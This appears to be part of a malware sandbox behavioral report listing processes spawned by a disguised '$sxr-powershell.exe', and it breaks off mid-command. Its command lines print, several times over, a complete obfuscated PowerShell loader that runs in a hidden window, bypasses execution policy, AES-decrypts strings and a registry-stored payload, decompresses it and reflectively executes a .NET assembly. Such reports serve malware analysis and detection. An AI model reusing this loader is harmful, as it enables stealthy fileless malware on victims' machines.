[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        21⤵
        Hide Artifacts: Hidden Window
        
        PID:7368
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5228).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        21⤵
        
        PID:7216
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5228).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        21⤵
        Hide Artifacts: Hidden Window
        
        PID:8024
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5228" "3092" "3004" "3096" "0" "0" "3100" "0" "0" "0" "0" "0"
        21⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5744
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8104).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        20⤵
        
        PID:4496
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "8104" "3068" "2988" "3004" "0" "0" "3076" "0" "0" "0" "0" "0"
        20⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:8548
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4308).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 